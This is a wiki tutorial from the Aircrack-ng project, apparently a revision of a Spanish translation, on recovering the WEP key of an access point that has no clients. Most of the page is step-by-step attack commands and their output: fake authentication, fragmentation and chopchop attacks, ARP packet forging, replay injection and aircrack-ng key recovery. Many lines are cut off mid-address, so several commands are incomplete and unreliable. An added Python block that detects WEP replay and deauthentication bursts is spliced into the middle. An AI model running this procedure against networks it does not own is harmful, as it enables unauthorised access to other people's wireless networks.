spanish_how_to_crack_wep_with_no_clients
Revision shown: 2007/02/23 22:19 by spanish. Current revision: 2009/08/14 18:25 by mister_x.
====== Tutorial: How to crack WEP with no clients ======
Version: 1.02, 10 February 2007
By: darkAudax
Video: http://
===== Introduction =====
There are many times when we come across wireless networks that have no clients connected. This tutorial describes how to obtain the WEP key when there are no clients. Although this topic has been discussed many times in the Forum, this tutorial is written with the aim of going into more detail and giving some examples.

It is recommended that you experiment with your own wireless access point, to become familiar with these ideas and techniques. If you do not have an access point of your own, remember that you must ask the owner of the router for permission

First of all, thanks go to the developers of the Aircrack-ng suite for creating such fantastic tools.

Please send me any suggestions, positive or negative. Whether they are problems or good ideas, they will be welcome.


===== Assumptions =====

We assume that:

  * You are using drivers patched for injection. You can capture packets with Wireshark to check whether you are injecting.
  * You are physically close enough to send packets to and receive packets from the access point. Remember that receiving packets from the access point does not mean that the packets you transmit are received by the AP. The signal strength of wireless cards is generally lower than that of APs, so you need to be close to the AP for the packets you transmit to be received by it.
  * There are no data packets coming from the access point. Beacons and other packets such as "
  * The access point uses WEP with open authentication. This will not work if the authentication is shared key authentication (SKA). With SKA, the only method when there are no clients is to capture the PRGA xor data with an airodump-ng handshake or to run an attack with aireplay-ng beforehand. This is because you need the PRGA xor file to perform a fake authentication successfully.
  * We are using aircrack-ng version 0.7. If you use another version, some commands may need to be written differently.

Make sure you meet all of the conditions,


===== Equipment used =====

In this tutorial:

  * MAC address of the PC running the aircrack-ng suite:
  * BSSID (MAC address of the access point): 00:
  * ESSID (name of the wireless network): teddy
  * AP channel: 9
  * Wireless interface: ath0

You must obtain the equivalent information for the network you want to work on, and change these values in the examples that follow.

===== Solution =====

==== Contents ====

Here are the steps we are going to follow:

  * 1 - Set the MAC address of the wireless card
  * 2 - Put the wireless interface into monitor mode and set the channel
  * 3 - Use aireplay-ng to do a fake authentication with the access point
  * 4 - Use the chopchop or fragmentation attack to obtain PRGA
  * 5 - Use packetforge-ng to create an ARP packet using the PRGA obtained in the previous step
  * 6 - Start airodump-ng on the AP's channel with a BSSID filter to capture IVs
  * 7 - Inject the ARP packet created in step 5
  * 8 - Run aircrack-ng to obtain the WEP key


==== Step 1 - Set the MAC address of the wireless card ====

To be honest, we did not change the MAC address of our card.

This is a reminder to use your real MAC address and not a fake one. In step 3 it is important that the MAC address used is that of our own card, in order to perform the fake authentication. If you want to change your card's MAC address, see this post in the English FAQ: [[http://

==== Step 2 - Put the wireless interface into monitor mode and set the channel ====

Enter the following command to put the wireless card

  airmon-ng start wifi0 9

Note: In this command we use "wifi0" instead of our interface "ath0". This is because we are using the madwifi-ng drivers and not madwifi-old.

The system will respond:


You can see that "ath0" is placed in monitor mode.

Enter "ifconfig ath0 up" to bring up the ath0 interface, which we will use next.

To confirm that the interface is configured correctly,

The system will respond:

  Bit Rate:0 kb/s
  Power Management:
  Link Quality=0/
  Rx invalid nwid:
  Tx excessive retries:

We can see that ath0 is in monitor mode, on frequency 2.452GHz, which corresponds to channel 9, and in "

To see the correspondence between frequency and channel, see: http://



=== Troubleshooting Tips ===

  * If another interface started other than ath0 then you can use that one or use "



==== Step 3 - Use aireplay-ng to do a fake authentication with the access point ====

This is a very important step.

In order for an access point to accept a packet, the source MAC address must already be associated.

The lack of association with the access point is the single biggest reason why injection fails.

To associate with an access point, use fake authentication:

  aireplay-ng -1 0 -e teddy -a 00:

Where:
  * -1 means fake authentication
  * 0 reassociation timing in seconds
  * -e teddy is the wireless network name
  * -a 00:
  * -h 00:
  * ath0 is the wireless interface name

Success looks like:
  18:
  18:
  18:
  18:

Or another variation for picky access points:

  aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:

Where:
  * 6000 - Reauthenticate every 6000 seconds.
  * -o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
  * -q 10 - Send keep alive packets every 10 seconds.

Success looks like:
  18:
  18:
  18:
  18:
  18:
  18:
  # and so on.

Here is an example of what a failed authentication looks like:
  8:
  18:
  18:
  18:
  18:
  18:
  18:
  18:
  18:
  18:
  18:

Notice the "Got a deauthentication packet"

=== Troubleshooting Tips ===

  * Some access points are configured to only allow selected MAC addresses to associate and connect.

  * If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets.

Run: "

Here is a typical tcpdump error message you are looking for:


Notice that the access point (00:

If you want to select only the DeAuth packets with tcpdump then you can use: "



==== Step 4 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA ====

The objective of the [[korek_chopchop|chopchop]] and [[fragmentation]] attacks is to obtain a PRGA (pseudo random generation algorithm) bit file. This PRGA is not the WEP key and cannot be used to decrypt packets.

Either the chopchop or the fragmentation attack can be used to obtain the PRGA bit file. The result is the same, so use whichever one works for you. The pros and cons of each attack are described on the [[aircrack-ng]] page.

We will cover the fragmentation technique first.

  aireplay-ng -5 -b 00:

Where:
  * -5 means the fragmentation attack
  * -b 00:
  * -h 00:
  * ath0 is the wireless interface name

The system will respond:

  Read 127 packets...

  Size: 114, FromDS: 1, ToDS: 0 (WEP)

  Dest. MAC = 01:

  Use this packet ? y

When a packet from the access point arrives, enter "

When successful, the system responds:

  Data packet found!
  Got RELAYED packet!!
  Thats our ARP packet!
  Got RELAYED packet!!
  Thats our ARP packet!
  Got RELAYED packet!!
  Thats our ARP packet!
  Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Success!

If the fragmentation attack was not successful, you can then try the chopchop technique next. Run:

  aireplay-ng -4 ath0 -h 00:

Where:
  * -4 means the chopchop attack
  * -h 00:
  * ath0 is the wireless interface name

The system responds:

  Read 165 packets...
  Size: 86, FromDS: 1, ToDS: 0 (WEP)
  Dest. MAC = FF:
  Use this packet ? y

You respond "

  Sent 957 packets, current guess: B9...

  The AP appears to drop packets shorter than 35 bytes.

Success!

=== Helpful Tips ===

  * Be sure the packet is 68 or more bytes, otherwise you may not have enough PRGA data to subsequently generate a packet.
  * At home, to generate some packets to force chopchop to start, ping a non-existent IP on your network.
  * You can check the decrypted packet by running "
  19:
  * If something happens part way through chopchop, you can reuse the source packet by entering "
  * Taking the previous tip further, if you have a capture file from another session, you can use it as input "

=== Troubleshooting Tips ===

  * If the first packet you select does not work, then try a few others. Sometimes it takes more than one try to be successful with either attack.
  * The chopchop attack will not be successful on some access points. If this happens, move on to the fragmentation attack.
  * Make sure you are properly associated. To check this, follow the tcpdump instructions in step 2.


==== Step 5 - Use packetforge-ng to create an ARP packet ====

In the previous step, we obtained PRGA. It does not matter which attack generated the PRGA; both are equal.

But first, let's generate the ARP packet for injection by entering:

  packetforge-ng -0 -a 00:

Where:
  * -0 means generate an ARP packet
  * -a 00:
  * -h 00:
  * -k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
  * -l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
  * -y fragment-0203-180343.xor is the file to read the PRGA from
  * -w arp-request is the name of the file to write the ARP packet to

The system will respond:

  Wrote packet to: arp-request

=== Helpful Tips ===

  * After creating the packet, use tcpdump to review it from a sanity point of view. See below.

  tcpdump -n -vvv -e -s0 -r arp-request


Since you are testing against your own AP (you are, right?), decrypt the packet and ensure it is correct.

Decrypt the packet: airdecap-ng -e teddy -w <put your WEP key here> arp-request
View the decrypted packet: tcpdump -n -r arp-request-dec
It should be something like:



==== Step 6 - Start airodump-ng ====

Open another console session to capture the generated IVs. Then enter:

  airodump-ng -c 9 --bssid 00:

Where:
  * -c 9 is the channel for the wireless network
  * --bssid 00:
  * --ivs specifies that you only want to capture the IVs. This keeps the file as small as possible.
  * -w capture is the file name prefix for the file which will contain the IVs.
  * ath0 is the interface name.


==== Step 7 - Inject the ARP packet created in step 5 ====

Using the console session where you generated the ARP packet, enter:

  aireplay-ng -2 -r arp-request ath0

Where:
  * -2 means use interactive frame selection
  * -r arp-request defines the file name from which to read the ARP packet
  * ath0 defines the interface to use

The system will respond:

  Size: 68, FromDS: 0, ToDS: 1 (WEP)

  Dest. MAC = FF:
  Source MAC = 00:

  0x0000:
  0x0010:
  0x0020:
  0x0030:
  0x0040:

  Use this packet ? y

Enter "

  You should also start airodump-ng to capture replies.

  End of file.

While this command is successfully running, the airodump-ng screen will look similar to:

  BSSID PWR RXQ Beacons

  00:

  BSSID STATION

  00:

You will notice that only one access point is displayed, since we included an airodump-ng filter to limit the capture to a single BSSID.

=== Troubleshooting Tips ===

  * If the BSSID data packets are not increasing, make sure you are still associated with the access point.


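From the defender's side, the stages above leave a recognisable trace in a monitor-mode capture: the fake-authentication phase shows up as the deauthentication frames the step 3 tcpdump check looks for, and the step 7 replay re-sends one encrypted frame, with the same IV every time, because WEP has no replay protection. The Python below is an added example, not part of this tutorial or of the Aircrack-ng suite; the frame dictionaries, the MAC addresses and the thresholds are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample of monitor-mode observations (not from the tutorial):
# one dict per 802.11 frame with the fields a WIDS would extract.
STA = "02:00:00:00:00:01"   # constructed client address (hypothetical)
AP = "02:00:00:00:00:aa"    # constructed access-point address (hypothetical)
SAMPLE_FRAMES = (
    # a station re-sending one 68-byte WEP data frame, same IV, every 10 ms
    [{"ts": 1.0 + 0.01 * i, "type": "data", "src": STA, "dst": AP,
      "len": 68, "iv": "a1b2c3"} for i in range(10)]
    # a normal client: every encrypted frame carries a fresh IV
    + [{"ts": 1.0 + 0.05 * i, "type": "data", "src": "02:00:00:00:00:02",
        "dst": AP, "len": 98, "iv": "%06x" % (0x100 + i)} for i in range(10)]
    # a burst of deauthentication frames aimed at the station
    + [{"ts": 2.0 + 0.2 * i, "type": "deauth", "src": AP, "dst": STA,
        "len": 26, "iv": None} for i in range(3)]
)

def _burst(times, min_count, window_s):
    """True if min_count of the timestamps fall inside one window_s span."""
    times = sorted(times)
    return any(times[i + min_count - 1] - times[i] <= window_s
               for i in range(len(times) - min_count + 1))

def find_wep_replay(frames, min_repeats=5, window_s=1.0):
    """Return (src, iv, len) triples repeated min_repeats+ times in window_s.

    WEP has no replay protection, so an AP accepts the same encrypted
    frame again and again; a legitimate sender changes the IV per frame,
    while a replayed frame carries the identical IV every time."""
    seen = defaultdict(list)
    for f in frames:
        if f["type"] == "data" and f["iv"] is not None:
            seen[(f["src"], f["iv"], f["len"])].append(f["ts"])
    return [k for k, t in seen.items() if _burst(t, min_repeats, window_s)]

def find_deauth_burst(frames, min_count=3, window_s=2.0):
    """Return (src, dst) pairs with min_count+ deauth frames in window_s.

    Repeated deauthentication towards one client is what the tutorial's
    tcpdump check shows; a WIDS raises it regardless of who sends it."""
    seen = defaultdict(list)
    for f in frames:
        if f["type"] == "deauth":
            seen[(f["src"], f["dst"])].append(f["ts"])
    return [k for k, t in seen.items() if _burst(t, min_count, window_s)]
```

On the constructed sample, the replaying station is the only (src, iv, len) triple flagged, and the normal client with changing IVs is not.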
==== Step 8 - Run aircrack-ng to obtain the WEP key ====

Start another console session and enter:

  aircrack-ng *.ivs -b 00:

Where:
  * *.ivs selects all files ending in "
  * -b 00:

You can run this while generating packets.

=== Troubleshooting Tips ===

  * Sometimes you need to try various techniques to crack the WEP key. Try "


===== Change Log =====
February 16/2007
  * Added video from [[http://

February 10/2007 v1.02
  * Added the assumption with regards to open authentication

February 7/2007 v1.01
  * Incorporated correction and feedback from cjaghblb

February 4/2007 v1.00
  * Initial Release
spanish_how_to_crack_wep_with_no_clients.1172265596.txt.gz · Last modified: 2007/02/23 22:19 (external edit)